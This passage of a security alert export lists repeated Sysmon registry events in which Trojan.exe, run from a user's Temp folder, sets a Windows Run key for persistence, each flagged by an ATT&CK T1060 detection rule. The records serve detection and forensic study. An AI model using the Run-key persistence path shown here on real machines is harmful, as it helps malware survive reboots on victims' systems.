HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:06.275309300Z"",""eventRecordID"":""1376"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:06.261\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:06.261"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.124",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:05.237 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:05.246812200Z"",""eventRecordID"":""1375"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:05.237\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:05.237"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.070",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:04.222 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:04.234653300Z"",""eventRecordID"":""1374"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:04.222\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:04.222"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.035",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:03.200 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:03.212351700Z"",""eventRecordID"":""1373"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:03.200\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:03.200"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.004",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:02.184 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:02.188503000Z"",""eventRecordID"":""1372"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:02.184\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:02.184"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.973",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:01.137 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:01.139344600Z"",""eventRecordID"":""1371"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:01.137\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:01.137"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.910",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:00.132 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:00.136984800Z"",""eventRecordID"":""1369"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:00.132\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:00.132"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.816",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:59.105 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:59.112914900Z"",""eventRecordID"":""1366"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:59.105\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:59.105"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.769",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:58.060 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:58.072285600Z"",""eventRecordID"":""1364"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:58.060\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:58.060"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.675",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:57.053 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:57.102558900Z"",""eventRecordID"":""1359"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:57.053\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:57.053"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.645",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:56.005 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:56.008002600Z"",""eventRecordID"":""1357"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:56.005\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:56.005"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.629",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:54.997 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 